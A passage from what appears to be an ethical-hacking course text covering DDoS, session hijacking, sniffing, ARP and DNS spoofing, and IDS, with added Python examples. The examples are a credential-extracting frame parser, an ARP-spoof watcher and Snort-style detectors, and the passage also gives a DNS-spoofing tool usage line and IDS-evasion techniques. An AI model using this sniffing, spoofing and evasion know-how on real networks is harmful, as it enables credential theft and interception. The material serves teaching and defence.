back to the compromised machine, you have to enlist the aid of another team of
administrators to collect fresh evidence and carry the trace further back.
Now remember that you have to do this in thousands of directions, to each of the
thousands of compromised machines that are participating in this attack. Today there's
no possibility of performing more than a few back-traces at most, in as little as a few
hours. Even that would require some luck to favor your efforts. So as long as the
attacker turns their attack off after at most a few hours, you are unlikely to find more
than a few of the thousands of machines used to launch the attack; the remainder will
remain available for further attacks. And the compromised machines that are found will
contain no evidence that can be used to locate the original attacker; your trace will stop
with them.
9.4 What is DDoS? ______________________________
DDoS attacks involve breaking into hundreds or thousands of machines all over the
Internet. Then the attacker installs DDoS software on them, allowing them to control all
these burgled machines to launch coordinated attacks on victim sites. These attacks
typically exhaust bandwidth, router processing capacity, or network stack resources,
breaking network connectivity to the victims.
So the perpetrator starts by breaking into weakly-secured computers, using well-known
defects in standard network service programs, and common weak configurations in
operating systems. On each system, once they break in, they perform some additional
steps. First, they install software to conceal the fact of the break-in, and to hide the
traces of their subsequent activity. For example, the standard commands for displaying
running processes are replaced with versions that fail to display the attacker's
processes. These replacement tools are collectively called a ``rootkit'', since they are
installed once you have ``broken root'', taken over system administrator privileges, to
keep other ``root users'' from being able to find you. Then they install a special process,
used to remote-control the burgled machine. This process accepts commands from over
the Internet, and in response to those commands it launches an attack over the Internet
against some designated victim site. And finally, they make a note of the address of the
machine they've taken over. All these steps are highly automated. A cautious intruder
will begin by breaking into just a few sites, then using them to break into some more,
and repeating this cycle for several steps, to reduce the chance they are caught during
this, the riskiest part of the operation. By the time they are ready to mount the kind of
attacks we've seen recently (gigabytes per second of traffic dumped on Yahoo,
according to reports in SANS) they have taken over thousands of machines and
assembled them into a DDoS network; this just means they all have the attack software
installed on them, and the attacker knows all their addresses (stored in a file on their
control system).
Now comes time for the attack. The attacker runs a single command, which sends
command packets to all the captured machines, instructing them to launch a particular
attack (from a menu of different varieties of flooding attacks) against a specific victim.
When the attacker decides to stop the attack, they send another single command.
9.5 Hacking Tool: Ping of Death ___________________
In 1996 and 1997, a common practice in the hacker community involved sending
malicious ICMP packets to computers on the Internet with the intention of "crashing"
them. This technique became known as the Ping of Death for its unpredictable
consequences and its relatively high probability of success.
The technique only worked because many network operating systems at the time were
not designed to handle these packets gracefully. Earlier versions of UNIX and Linux
computers, Macintoshes, NetWare servers, and some Windows computers were all
prone to attack. In a nutshell, the Ping of Death involved sending an unusually large
ICMP request that created buffer overflow conditions on the remote computers. Such
overflows could hang the computer's network applications, crash the operating system,
or possibly create other undesirable effects.
Although developers quickly fixed the "holes", these operating systems were susceptible
to oversized packets from sources other than ping. Effectively any IP packet larger than
65,535 bytes, whether TCP, UDP, ICMP or another protocol, could do the trick; ping
utilities merely happened to be the most convenient way to generate one.
Hacking Tool: SSPing
Hacking Tool: Land
Hacking Tool: Smurf
Hacking Tool: SYN Flood
Hacking Tool: CPU Hog
Hacking Tool: Win Nuke
Hacking Tool: RPC Locator
Hacking Tool: Jolt2
Hacking Tool: Bubonic
Hacking Tool: Targa
9.6 Tools for Running DDoS Attacks _______________
Hacking Tool: Trinoo
Hacking Tool: WinTrinoo
Hacking Tool: TFN
Hacking Tool: TFN2K
Hacking Tool: Stacheldraht
Hacking Tool: Shaft
Hacking Tool: mstream
DDoS Attack Sequence
Preventing DoS Attack
DoS Scanning Tools
Find_ddos
SARA
DDoSPing
RID
Zombie Zapper
9.7 SESSION HIJACKING_________________________
9.7.1 What is Session Hijacking?
TCP session hijacking is when an attacker takes over an established TCP session between
two machines. Since most applications authenticate only at the start of a session, taking
the session over afterwards gives the attacker the authenticated user's access to the
machine without ever learning the password.
A popular (older) method uses source-routed IP packets. This allows an attacker at point A
on the network to participate in a conversation between B and C by making the IP packets
pass through A's machine.
If source routing is turned off, the attacker can use "blind" hijacking, guessing the TCP
sequence numbers and the responses of the two machines. The attacker can inject a
command but never sees the response. A common injected command sets a password or
adds an account allowing access from somewhere else on the net.
A hacker can also be "inline" between B and C using a sniffing program to watch the
conversation. This is known as a "man-in-the-middle attack".
A common component of such an attack is to execute a denial-of-service (DoS) attack
against one end-point to stop it from responding. This attack can be either against the
machine to force it to crash, or against the network connection to force heavy packet
loss.
Hacking Tool: Juggernaut
Hacking Tool: Hunt
Hacking Tool: TTYWatcher
Hacking Tool: IP Watcher
Hacking Tool: T-Sight
9.8 Sniffers_________________________
9.8.1 Introduction
It's a cruel irony of information security that many of the features that make using
computers easier or more efficient, and the tools used to protect and secure the network,
can also be used to exploit and compromise the same computers and networks. This is
the case with packet sniffing.
A packet sniffer, sometimes referred to as a network monitor or network analyzer, can
be used legitimately by a network or system administrator to monitor and troubleshoot
network traffic. Using the information captured by the packet sniffer an administrator can
identify erroneous packets and use the data to pinpoint bottlenecks and help maintain
efficient network data transmission.
In its simplest form a packet sniffer just captures all of the packets of data that pass
through a given network interface.
Normally the network interface hands the sniffer only packets addressed to the machine in
question (plus broadcasts). If the interface is placed into promiscuous mode, the sniffer
also receives every packet that reaches the interface, regardless of its destination.
By placing a packet sniffer on a network in promiscuous mode, a malicious intruder can
capture and analyze all of the network traffic that reaches that interface. Older
protocols such as Telnet, FTP, POP3 and HTTP Basic authentication transmit usernames
and passwords in clear text, so that information is readable to anyone analyzing the
captured packets.
A packet sniffer can only capture packets that reach its own network segment. So it's not
possible for a malicious attacker to place a packet sniffer on their home ISP network and
capture traffic from inside your corporate network (although there are ways to more or
less "hijack" services running on your internal network and effectively perform packet
sniffing from a remote location). To sniff the corporate network, the sniffer needs to be
running on a computer that is inside the corporate network as well. On a switched network
the switch normally delivers to each port only the traffic meant for it, so even an
inside sniffer sees little unless the switch is attacked (see EtherFlood, macof and ARP
spoofing below).
However, if one machine on the internal network becomes compromised through a
Trojan or other security breach, the intruder could run a packet sniffer from that machine
and use the captured username and password information to compromise other
machines on the network.
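What a sniffer in promiscuous mode actually yields is raw frames; the work is in parsing them and spotting the clear-text logins. The following is an added example, not code from the original course text or from any of the tools listed in this chapter: it decodes Ethernet/IPv4/TCP headers by hand and pulls credentials out of an FTP login and an HTTP Basic authentication header. The frames are constructed in build_frame() with private-range addresses; their checksums are left at zero, which a passive parser never checks.

```python
"""Decode raw Ethernet/IPv4/TCP frames and extract clear-text credentials.
Added example; the capture below is constructed, not recorded."""
import base64
import struct
from typing import Dict, List, Optional, Tuple


def _ip_bytes(dotted: str) -> bytes:
    return bytes(int(octet) for octet in dotted.split("."))


def build_frame(src_ip: str, dst_ip: str, sport: int, dport: int, payload: bytes) -> bytes:
    """Constructed Ethernet II + IPv4 + TCP frame (no options, zero checksums)."""
    eth = b"\x00\x11\x22\x33\x44\x55" + b"\x66\x77\x88\x99\xaa\xbb" + b"\x08\x00"
    ip = struct.pack("!BBHHHBBH4s4s", 0x45, 0, 40 + len(payload), 0x1234, 0, 64, 6, 0,
                     _ip_bytes(src_ip), _ip_bytes(dst_ip))
    tcp = struct.pack("!HHIIBBHHH", sport, dport, 1, 1, 5 << 4, 0x18, 65535, 0, 0)
    return eth + ip + tcp + payload


def parse_frame(frame: bytes) -> Optional[Tuple[str, str, int, int, bytes]]:
    """Return (src ip, dst ip, sport, dport, tcp payload), or None for non-IPv4/TCP frames."""
    if len(frame) < 54 or frame[12:14] != b"\x08\x00":      # EtherType must be IPv4
        return None
    ip = frame[14:]
    if ip[0] >> 4 != 4 or ip[9] != 6:                        # version 4, protocol TCP
        return None
    ihl = (ip[0] & 0x0F) * 4
    total = struct.unpack("!H", ip[2:4])[0]
    src = ".".join(map(str, ip[12:16]))
    dst = ".".join(map(str, ip[16:20]))
    tcp = ip[ihl:total]
    sport, dport = struct.unpack("!HH", tcp[:4])
    data_offset = (tcp[12] >> 4) * 4
    return src, dst, sport, dport, tcp[data_offset:]


def extract_credentials(frames: List[bytes]) -> List[Dict[str, str]]:
    """Walk a capture and collect clear-text logins from FTP (port 21) and HTTP Basic (port 80)."""
    found: List[Dict[str, str]] = []
    pending_user: Dict[Tuple[str, str, int], str] = {}    # FTP USER seen, PASS not yet
    for frame in frames:
        parsed = parse_frame(frame)
        if parsed is None:
            continue
        src, dst, sport, dport, payload = parsed
        text = payload.decode("latin-1")
        if dport == 21:
            for line in text.splitlines():
                verb, _, arg = line.partition(" ")
                if verb.upper() == "USER":
                    pending_user[(src, dst, sport)] = arg.strip()
                elif verb.upper() == "PASS":
                    found.append({"proto": "ftp", "client": src, "server": dst,
                                  "user": pending_user.pop((src, dst, sport), "?"),
                                  "password": arg.strip()})
        elif dport == 80:
            for line in text.split("\r\n"):
                if line.lower().startswith("authorization: basic "):
                    decoded = base64.b64decode(line.split(" ", 2)[2]).decode("latin-1")
                    user, _, password = decoded.partition(":")
                    found.append({"proto": "http-basic", "client": src, "server": dst,
                                  "user": user, "password": password})
    return found


# Constructed capture: an FTP login, the server's prompt, and an HTTP request with Basic auth.
CAPTURE = [
    build_frame("192.168.1.20", "192.168.1.5", 51000, 21, b"USER alice\r\n"),
    build_frame("192.168.1.5", "192.168.1.20", 21, 51000, b"331 Password required for alice\r\n"),
    build_frame("192.168.1.20", "192.168.1.5", 51000, 21, b"PASS hunter2\r\n"),
    build_frame("192.168.1.21", "192.168.1.9", 51001, 80,
                b"GET /admin/ HTTP/1.1\r\nHost: intranet\r\nAuthorization: Basic "
                + base64.b64encode(b"bob:s3cret") + b"\r\n\r\n"),
]

if __name__ == "__main__":
    for cred in extract_credentials(CAPTURE):
        print(cred)
```

The parser trusts the length fields in the headers; a production sniffer must bound every slice by the captured length, because a truncated or deliberately malformed frame is exactly what an attacker would feed a monitoring tool.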
9.9 Tools used for Sniffing:
1. Ethereal
2. Snort
3. Windump
4. Etherpeek
9.9.1 Tool: Ethereal
Figure: 9.1
9.9.2 Tool: Snort
Figure: 9.2
There are three main modes in which Snort can be configured:
Sniffer, Packet logger, and Network Intrusion Detection System
1. Sniffer mode simply reads the packets off of the network and displays them for you in a continuous
stream on the console.
2. Packet logger mode logs the packets to the disk.
3. Network intrusion detection mode is the most complex and configurable of the three, allowing
Snort to analyze network traffic for matches against a user-defined rule set.
9.9.3 Tool: Windump
Figure: 9.3
WinDump is the port to the Windows platform of tcpdump, the most widely used network
sniffer/analyzer for UNIX.
9.9.4 Tool: Etherpeek
Figure: 9.4
Passive Sniffing
Figure: 9.4
Active Sniffing
Figure: 9.5
9.9.5 EtherFlood
1. EtherFlood floods a switched network with Ethernet frames carrying random source hardware addresses.
2. Once the switch's MAC address (CAM) table fills up, some switches fail open and start sending all
traffic out on all ports, so that the attacker is able to sniff all traffic on the network.
9.9.6 dsniff
dsniff is a collection of tools for network auditing and penetration testing.
1. dsniff, filesnarf, mailsnarf, msgsnarf, urlsnarf, and webspy passively monitor a network for
interesting data (passwords, e-mail, files, etc.).
2. arpspoof, dnsspoof, and macof facilitate the interception of network traffic normally unavailable to
an attacker (e.g. due to layer-2 switching).
3. sshmitm and webmitm implement active monkey-in-the-middle attacks against redirected SSH
and HTTPS sessions by exploiting weak bindings in ad-hoc PKI.
9.9.7 ARP Spoofing
Figure: 9.6
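ARP spoofing works because hosts accept any reply that claims an IP-to-MAC binding, whether or not they asked. The following added example (not code from the original course text or from dsniff/arpspoof) parses ARP frames from raw bytes and runs a small passive watcher over them that reports the two things a spoofing run produces: a reply nobody asked for, and an address that suddenly maps to a different MAC. The frames are constructed in build_arp() with private-range addresses.

```python
"""ARP frame parser plus a passive ARP-spoofing watcher.
Added example; the frames below are constructed, not captured."""
import struct
from typing import Dict, List, Optional, Set, Tuple

BROADCAST = b"\xff" * 6


def _mac_str(raw: bytes) -> str:
    return ":".join(f"{b:02x}" for b in raw)


def _ip_bytes(dotted: str) -> bytes:
    return bytes(int(o) for o in dotted.split("."))


def build_arp(op: int, sender_mac: bytes, sender_ip: str, target_mac: bytes, target_ip: str) -> bytes:
    """Constructed Ethernet II frame carrying an ARP request (op=1) or reply (op=2)."""
    eth = (BROADCAST if op == 1 else target_mac) + sender_mac + b"\x08\x06"
    arp = struct.pack("!HHBBH6s4s6s4s", 1, 0x0800, 6, 4, op,
                      sender_mac, _ip_bytes(sender_ip), target_mac, _ip_bytes(target_ip))
    return eth + arp


def parse_arp(frame: bytes) -> Optional[Tuple[int, str, str, str, str]]:
    """Return (op, sender mac, sender ip, target mac, target ip) or None if not Ethernet/IPv4 ARP."""
    if len(frame) < 42 or frame[12:14] != b"\x08\x06":
        return None
    htype, ptype, hlen, plen, op, smac, sip, tmac, tip = struct.unpack("!HHBBH6s4s6s4s", frame[14:42])
    if (htype, ptype, hlen, plen) != (1, 0x0800, 6, 4):
        return None
    return op, _mac_str(smac), ".".join(map(str, sip)), _mac_str(tmac), ".".join(map(str, tip))


class ArpWatcher:
    """Passive monitor: learn IP->MAC bindings from replies and report anomalies."""

    def __init__(self) -> None:
        self.table: Dict[str, str] = {}     # ip -> mac learned from replies
        self.asked: Set[str] = set()        # ips someone has requested and not yet heard about
        self.alerts: List[str] = []

    def observe(self, frame: bytes) -> None:
        parsed = parse_arp(frame)
        if parsed is None:
            return
        op, smac, sip, _tmac, tip = parsed
        if op == 1:                         # request: remember that tip is being looked up
            self.asked.add(tip)
            return
        if sip in self.asked:               # reply answers an outstanding request
            self.asked.discard(sip)
        else:                               # unsolicited reply: what arpspoof sends
            self.alerts.append(f"unsolicited reply: {sip} is-at {smac}")
        known = self.table.get(sip)
        if known is not None and known != smac:
            self.alerts.append(f"binding change: {sip} was {known}, now {smac}")
        self.table[sip] = smac


# Constructed hosts on 10.0.0.0/24.
GATEWAY_MAC = b"\x00\x00\x0c\x00\x00\x01"
VICTIM_MAC = b"\x00\x1b\x21\x00\x00\x05"
ATTACKER_MAC = b"\xde\xad\xbe\xef\x00\x66"
SAMPLE = [
    build_arp(1, VICTIM_MAC, "10.0.0.5", b"\x00" * 6, "10.0.0.1"),     # victim asks: who has 10.0.0.1?
    build_arp(2, GATEWAY_MAC, "10.0.0.1", VICTIM_MAC, "10.0.0.5"),     # gateway answers
    build_arp(2, ATTACKER_MAC, "10.0.0.1", VICTIM_MAC, "10.0.0.5"),    # attacker to victim: 10.0.0.1 is-at me
    build_arp(2, ATTACKER_MAC, "10.0.0.5", GATEWAY_MAC, "10.0.0.1"),   # attacker to gateway: 10.0.0.5 is-at me
]


def run_sample() -> ArpWatcher:
    watcher = ArpWatcher()
    for frame in SAMPLE:
        watcher.observe(frame)
    return watcher


if __name__ == "__main__":
    w = run_sample()
    print("learned:", w.table)
    for alert in w.alerts:
        print("ALERT", alert)
```

The unsolicited-reply rule also fires on legitimate gratuitous ARP (a host announcing itself at boot, or a VRRP failover), so in practice it is the binding-change alert, tied to a list of addresses that should never move (the default gateway above all), that is worth paging on.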
9.9.8 Sniffing HTTPS and SSH
1. An SSL connection uses a session key, negotiated during the handshake, to encrypt all data sent by
server and client.
2. SSH is likewise built on public-key cryptography: the server identifies itself with a host key.
3. With SSH the session key is established under the protection of that host key, so an eavesdropper
who only watches the traffic learns nothing.
4. As such, these protocols, SSL and SSH, are sound from a security standpoint. The problem lies in
the basis of the trust: the server certificate and the server's public host key. A man-in-the-middle
presents its own certificate or host key, and if the client does not verify it, or the user clicks past the
warning, the attacker holds one encrypted session with each side and reads everything in between.
9.9.9 Man in the Middle Attack
Figure: 9.7
Macof, MailSnarf, URLSnarf, WebSpy
1. Macof floods the local network with random MAC addresses, causing some switches to fail open
in repeating mode, and thereby facilitates sniffing.
2. Mailsnarf is capable of capturing and outputting SMTP mail traffic that is sniffed on the network.
3. urlsnarf is a neat tool for monitoring Web traffic.
4. Webspy allows the user to see all the web pages visited by the victim.
9.9.10 Ettercap
Figure: 9.8
9.9.11 SMAC
SMAC is a utility for setting a specific MAC address for a network interface.
Figure: 9.9
9.9.12 Mac Changer
1. MAC changer is a Linux utility for setting a specific MAC address for a network interface.
2. It enables the user to set the MAC address randomly. It allows specifying the MAC of another
vendor or setting another MAC of the same vendor.
3. The user can also set a MAC of the same kind (e.g.: wireless card).
4. It offers a choice of vendor MAC list (more than 6200 items) to choose from.
9.9.13 Iris
Figure: 9.10
9.9.14 DNS Sniffing and Spoofing
1. DNS spoofing has occurred when a DNS answer maps a name to an IP address other than the
legitimate one.
2. To poison a DNS cache, the attacker supplies a faulty answer. It can come from his own domain
running a hacked DNS server, one whose address records are manipulated to suit the attacker's
needs, or it can be a forged reply that races the real one by copying the transaction ID of the
victim's outstanding query.
9.9.15 WinDNSSpoof
This tool is a simple DNS ID spoofer for Windows 9x/2K. To use it you must be able to sniff the traffic
of the computer being attacked, so that the transaction ID of its query can be copied into the forged reply.
Usage : wds –h
Example : wds -n www.microsoft.com -i 216.239.39.101
-g 00-00-39-5c-45-3b
Chapter-10
IDS & Firewalls
Session Objectives:
At the end of this Session, you will be able to understand –
Intrusion Detection Systems (IDS)
System Integrity Verifiers (SIV)
How Does IDS Match Signatures With Incoming Traffic?
Evading IDS Systems
Hacking Tool:
Placing Backdoors through Firewalls
Hacking Tool:
What Is A Honeypot?
Introduction____________________________________
10.1 Intrusion Detection Systems (IDS)
1. An Intrusion Detection System (IDS) monitors packets on the network wire and
attempts to discover whether an attacker is attempting to break into a system (or
cause a denial-of-service attack).
2. A typical example is a system that watches for a large number of TCP connection
requests (SYN) to many different ports on a target machine, thus discovering that
someone is attempting a TCP port scan.
3. Generally speaking, there are four different categories of intrusion detection
systems: network intrusion detection, system integrity verifiers, log file
monitors, and deception systems.
4. Network intrusion detection systems (NIDS) monitor packets traversing the
network in an attempt to discover anomalies indicating that an intruder is trying to
break into a system or, worse, launch a distributed denial-of-service (DDoS)
attack. NIDSs look for frequent connection requests to different ports to reveal
port scans.
10.2 System Integrity Verifiers (SIV)________________
1. System Integrity Verifiers (SIV) monitor system files in order to detect when an intruder
changes them, typically by comparing cryptographic hashes against a trusted baseline.
2. Tripwire is one of the most popular SIVs.
3. SIVs may also watch other components, such as the Windows registry and the cron
configuration, for known signs of tampering.
Figure: 10.1
Anomaly Detection
1. The idea behind this approach is to measure a "baseline" of such stats as CPU
utilization, disk activity, user logins, file activity, and so forth.
2. The benefit of this approach is that it can detect the anomalies without having to
understand the underlying cause behind the anomalies.
Signature Recognition
This means that for every hacker technique, the engineers code something into
the system for that technique.
This can be as simple as a pattern match. The classic example is to examine
every packet on the wire for the pattern "/cgi-bin/phf?" which indicates an attempt
to access this vulnerable CGI script on a web-server.
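The two detection ideas in this section, the content signature ("/cgi-bin/phf?") and the SYN-to-many-ports port-scan rule from 10.1, are small enough to show working together. The following is an added example, not code from the original course text or from Snort: packets are plain dictionaries constructed in run_sample(), the second content rule and the scan thresholds (15 distinct ports within 10 seconds) are assumptions chosen for the demonstration.

```python
"""A minimal signature-matching NIDS: content rules plus a port-scan threshold.
Added example; traffic is constructed in run_sample()."""
from collections import defaultdict
from typing import Dict, List, Tuple

Packet = Dict[str, object]   # keys: t (seconds), src, dst, dport, flags, payload (bytes)

SIGNATURES: List[Tuple[str, bytes]] = [
    ("phf CGI probe", b"/cgi-bin/phf?"),      # the classic example from the text
    ("directory traversal", b"../../"),      # assumed second rule for illustration
]


class SignatureIDS:
    def __init__(self, scan_ports: int = 15, scan_window: float = 10.0) -> None:
        self.scan_ports = scan_ports          # distinct ports that count as a scan
        self.scan_window = scan_window        # seconds
        # (src, dst) -> {dport: time of the last SYN to it}
        self.syn_seen: Dict[Tuple[str, str], Dict[int, float]] = defaultdict(dict)
        self.scan_reported: set = set()       # report each scanning pair once

    def inspect(self, pkt: Packet) -> List[str]:
        alerts: List[str] = []
        payload = pkt["payload"]
        for name, pattern in SIGNATURES:              # pattern match, Snort "content:" style
            if pattern in payload:
                alerts.append(f"{name}: {pkt['src']} -> {pkt['dst']}:{pkt['dport']}")
        if pkt["flags"] == "S":                       # bare SYN: a connection attempt
            key = (pkt["src"], pkt["dst"])
            ports = self.syn_seen[key]
            ports[pkt["dport"]] = pkt["t"]
            for port in [p for p, t in ports.items() if pkt["t"] - t > self.scan_window]:
                del ports[port]                       # forget attempts outside the window
            if len(ports) >= self.scan_ports and key not in self.scan_reported:
                self.scan_reported.add(key)
                alerts.append(f"port scan: {key[0]} probed {len(ports)} ports on {key[1]} "
                              f"within {self.scan_window:g}s")
        return alerts


def run_sample() -> List[str]:
    """Constructed traffic: a 20-port scan, a normal request, then a phf probe."""
    ids = SignatureIDS()
    traffic: List[Packet] = []
    for i, port in enumerate(range(20, 40)):          # SYNs to 20 ports, 0.1 s apart
        traffic.append({"t": i * 0.1, "src": "192.0.2.10", "dst": "203.0.113.5",
                        "dport": port, "flags": "S", "payload": b""})
    traffic.append({"t": 30.0, "src": "198.51.100.4", "dst": "203.0.113.5", "dport": 80,
                    "flags": "PA", "payload": b"GET /index.html HTTP/1.0\r\n\r\n"})
    traffic.append({"t": 31.0, "src": "192.0.2.10", "dst": "203.0.113.5", "dport": 80,
                    "flags": "PA", "payload": b"GET /cgi-bin/phf?Qalias=x HTTP/1.0\r\n\r\n"})
    alerts: List[str] = []
    for pkt in traffic:
        alerts.extend(ids.inspect(pkt))
    return alerts


if __name__ == "__main__":
    for alert in run_sample():
        print(alert)
```

Both rules are trivially evaded in this form: the scanner can spread its probes over more than the window, and the probe can be split across TCP segments so that no single payload contains the whole pattern, which is why real engines reassemble streams before matching (the evasion topic later in this chapter).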
Signature verification systems
A signature verification system has five components:
1. Data capture -- the process of converting the signature into digital form.
2. Preprocessing -- the data transformation in a standard format.
3. Feature extraction -- the process of extracting key information from the digital
representation of the signature.
4. Comparison process -- matches extracted features with templates stored in a
database. Usually, the output is a fit ratio.
5. Performance evaluation -- the decision step typically made by thresholding the
fit value.
10.3 How does IDS match Signatures with Incoming
Traffic?
Existing IDSs based on signature recognition focus on two kinds of activity data from a
computer network system: network traffic data and computer audit data. A variety of
activity attributes can be obtained from these data, producing nominal variables such as
the event type, user id, process id, command and remote IP address, and numerical
variables such as the time stamp, CPU time, etc. Activity data from a computer network
system are huge and complex. A computer auditing facility such as the Solaris Basic
Security Module (BSM) can easily produce hundreds of thousands of audit records per
day, and the attributes extracted from each audit record can number in the hundreds (e.g.
284 event types). As intrusive activities change over time, additional activity data must be
taken into account to capture signature patterns of new intrusive activities. That is, we
need a data mining algorithm that supports scalable, incremental learning.
10.3.1 Protocol Stack Verification
RFCs (Request for Comments) specify how the IP protocol stack should work. Attacks
often exploit some IP weakness (often due to an incomplete RFC specification) or
flaws in stack implementations. Known attacks include the Ping of Death, stealth scanning
and improper use of the TCP three-way handshake. It is worth noting that broken
hardware can also generate invalid traffic, not often filtered at the source (e.g. on the hub),
that could appear as an ongoing attack.
10.3.2 Application Protocol Verification
Intruders often exploit application protocol weakness for crashing applications or
breaking into hosts. Attacks such as WinNuke and invalid packets that cause DNS
cache corruption fall into this category.
10.3.3 What Happens after IDS Detects an Attack?
Attacks can be considered attempts to penetrate a system or to circumvent a system's
security in order to gain information, modify information or disrupt the intended
functioning of the targeted network or system. The following is a list and explanation of
the most common types of Internet attack that an IDS is set up to detect.
Attacks: DOS - Denial of Service attack
Rather than penetrating a system's security by hacking, a DOS attack will just take the
system out, denying the service to its users. The means of achieving this vary from
buffer overflows to flooding the system's resources. These days systems are slightly
more DOS aware; this has resulted in DDOS attacks.
Attacks: DDOS - Distributed Denial of Service
A standard DOS attack, the type that uses large quantities of data from a single host to a
remote host, cannot deliver sufficient packets to achieve the desired result, therefore the
attack will be launched from many dispersed hosts, hence the name DDOS. Sheer
weight of numbers takes out the remote system or swamps its connection. Steve
Gibson has written an article called The Strange Case of the Denial of Service Attacks
against GRC.com about how his network ground to a halt when a 13 year old boy
carried out a DDOS attack against him.
Attacks: Smurf
An older attack but one that is still frequently attempted, a smurf occurs when a ping is
sent to a smurf amplifier's broadcast address using the spoofed source address of the
target; all the active hosts then reply to the target, swamping its connection.
Attacks: Trojans
The term Trojan comes from the wooden horse used by the Greeks to attack Troy. The
horse contained Greek soldiers who, once the horse was wheeled inside the city, spilled
out of the horse and laid siege to the city and its inhabitants. In computer terms it
originally referred to software that appears to be legitimate, but that actually contains
hidden malicious software. When the legitimate program was run, the malicious
software was installed, unknown to the user. However, as the majority of malicious
programs installed in this fashion were remote control tools, the term Trojan soon
evolved to refer to this type of tool, such as BackOrifice, SubSeven and NetBus etc.
IDS Software Vendors
1. Black ICE by Network ICE (http://www.networkice.com)
2. CyberCop Monitor by Network Associates, Inc. (http://www.nai.com)
3. RealSecure by Internet Security Systems (ISS) (http://www.iss.net)
4. NetRanger by WheelGroup/Cisco (http://www.wheelgroup.com)
5. eTrust Intrusion Detection by Computer Associates (http://www.cai.com)
6. NetProwler by Axent (http://www.axent.com)
7. Centrax by Cybersafe (http://www.cybersafe.com)
8. NFR by Network Flight Recorder (http://www.nfr.net)
9. Dragon by Security Wizards (http://www.network-defense.com)
10. Snort (http://www.snort.org)
Snort is an open-source intrusion detection system. It contains over a thousand
signatures and can be downloaded at http://www.snort.org/cgi-bin/done.cgi
Check out the following example of PHF attack detection, in which a plain text string is
searched for in the application layer:
alert tcp any any -> 192.168.1.0/24 80 (msg: "PHF attempt"; content: "/cgi-bin/phf";)
This rule alerts on any TCP connection from any IP address and any port to port 80 on
the 192.168.1.x subnet. It searches for the content "/cgi-bin/phf" anywhere in the
payload. If it finds such content, it alerts the console with the message
"PHF attempt".
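To show what the rule above actually does when traffic arrives, here is a small rule matcher written for this page (it is not Snort's code and not part of the course). It parses the header and the quoted msg/content options of a Snort-style rule, then evaluates the rule against constructed packets. It goes a little beyond the page's rule in what it accepts: CIDR and single-host addresses, port ranges written as lo:hi, and the <> bidirectional operator. The packet records and addresses below are constructed.

```python
"""Minimal Snort-style signature matcher (added example, not Snort itself)."""
import ipaddress
import re
from dataclasses import dataclass
from typing import List, Optional

# The rule from the text, with Snort's lowercase action keyword.
RULE = 'alert tcp any any -> 192.168.1.0/24 80 (msg:"PHF attempt"; content:"/cgi-bin/phf";)'


@dataclass
class Packet:
    proto: str
    src: str
    sport: int
    dst: str
    dport: int
    payload: bytes


_OPT_RE = re.compile(r'(\w+)\s*:\s*"([^"]*)"')  # quoted option values only


def parse_rule(text: str) -> dict:
    """Split a rule into its header fields plus the msg and content options."""
    header, _, opts = text.partition("(")
    action, proto, src, sport, direction, dst, dport = header.split()
    pairs = _OPT_RE.findall(opts.rstrip(" )"))
    return {
        "action": action.lower(), "proto": proto.lower(),
        "src": src, "sport": sport, "direction": direction, "dst": dst, "dport": dport,
        "msg": next((v for k, v in pairs if k == "msg"), ""),
        "contents": [v.encode() for k, v in pairs if k == "content"],
    }


def _addr_match(spec: str, addr: str) -> bool:
    if spec == "any":
        return True
    ip = ipaddress.ip_address(addr)
    if "/" in spec:
        return ip in ipaddress.ip_network(spec, strict=False)
    return ip == ipaddress.ip_address(spec)


def _port_match(spec: str, port: int) -> bool:
    if spec == "any":
        return True
    if ":" in spec:  # Snort range syntax lo:hi, either side may be empty
        lo, _, hi = spec.partition(":")
        return (int(lo) if lo else 0) <= port <= (int(hi) if hi else 65535)
    return int(spec) == port


def _header_match(rule: dict, pkt: Packet) -> bool:
    return (_addr_match(rule["src"], pkt.src) and _port_match(rule["sport"], pkt.sport)
            and _addr_match(rule["dst"], pkt.dst) and _port_match(rule["dport"], pkt.dport))


def match(rule: dict, pkt: Packet) -> Optional[str]:
    """Return the rule's msg when the packet matches header and all content options."""
    if rule["proto"] != pkt.proto.lower():
        return None
    ok = _header_match(rule, pkt)
    if not ok and rule["direction"] == "<>":
        swapped = Packet(pkt.proto, pkt.dst, pkt.dport, pkt.src, pkt.sport, pkt.payload)
        ok = _header_match(rule, swapped)
    if not ok:
        return None
    # Every content option must appear in the payload (case-sensitive, as Snort's default).
    return rule["msg"] if all(c in pkt.payload for c in rule["contents"]) else None


# Constructed sample traffic: one hit on the monitored subnet, then three misses
# (wrong destination network, benign request, wrong transport protocol).
SAMPLE_PACKETS: List[Packet] = [
    Packet("tcp", "203.0.113.7", 51514, "192.168.1.10", 80, b"GET /cgi-bin/phf HTTP/1.0\r\n\r\n"),
    Packet("tcp", "203.0.113.7", 51515, "10.0.0.5", 80, b"GET /cgi-bin/phf HTTP/1.0\r\n\r\n"),
    Packet("tcp", "203.0.113.7", 51516, "192.168.1.10", 80, b"GET /index.html HTTP/1.0\r\n\r\n"),
    Packet("udp", "203.0.113.7", 51517, "192.168.1.10", 80, b"/cgi-bin/phf"),
]


def run_sample() -> List[Optional[str]]:
    rule = parse_rule(RULE)
    return [match(rule, p) for p in SAMPLE_PACKETS]


if __name__ == "__main__":
    for pkt, verdict in zip(SAMPLE_PACKETS, run_sample()):
        print(f"{pkt.src}:{pkt.sport} -> {pkt.dst}:{pkt.dport}  {verdict or '-'}")
```

The matcher works on a single packet's payload, which is exactly the limitation section 10.4 and 10.5 go on to describe: a real sensor must first reassemble IP fragments and TCP streams, otherwise the string can be split across packets and never seen whole.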
10.4 Evading IDS Systems________________________
1. Many simple network intrusion detection systems rely upon "pattern matching".
2. Attack scripts have well known patterns, so simply compiling a database of the
output of known attack scripts provides pretty good detection, but this can easily be
evaded by simply changing the script.
3. IDS evasion focuses on foiling signature matching by altering an attacker’s
appearance.
4. For example, some POP3 servers are vulnerable to a buffer overflow when a
long password is entered. It is easy to evade simply by changing the attack script.
10.5 Complex IDS Evasion________________________
1. An intruder might send a TCP SYN packet that the IDS sees, but the victim host
never sees. This causes the IDS to believe the connection is closed, but when in
fact it is not. Since TCP connections do not send "keep-alives", the intruder could
wait hours or days after this "close" before continuing the attack.
2. The first attack is to find a way to pass packets as far as the IDS, and cause a
later router to drop packets.
3. This depends upon the router configuration, but typical examples include low TTL
fields, fragmentation, source routing, and other IP options.
4. If there is a slow link past the IDS, then the hacker can flood the link with high
priority IP packets, and send the TCP FIN as a low priority packet - the router's
queuing mechanism will likely drop the packet.
10.6 Hacking Tool:_______________________________
10.6.1 Fragrouter
1. Fragrouter is a program for routing network traffic in such a way as to elude most
